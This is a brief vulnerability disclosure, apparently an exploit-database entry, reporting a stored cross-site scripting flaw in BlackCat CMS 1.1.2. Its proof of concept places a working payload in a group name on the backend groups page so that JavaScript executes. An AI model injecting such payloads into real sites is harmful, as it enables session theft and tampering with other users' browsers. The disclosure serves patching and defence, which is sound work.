​# Affected software: black cat cms
# Type of vulnerability:stored xss
# URL:http://blackcat-cms.org/
# Discovered by: provensec
# Website: provensec.com

#version:BlackCat CMS 1.1.2
# Proof of concept​

goto ad group page
http://demo.opensourcecms.com/blackcat/backend/groups/index.php

and and new group with name as xss payload "><img src=d onerror=confirm(1);>

and javascript will execute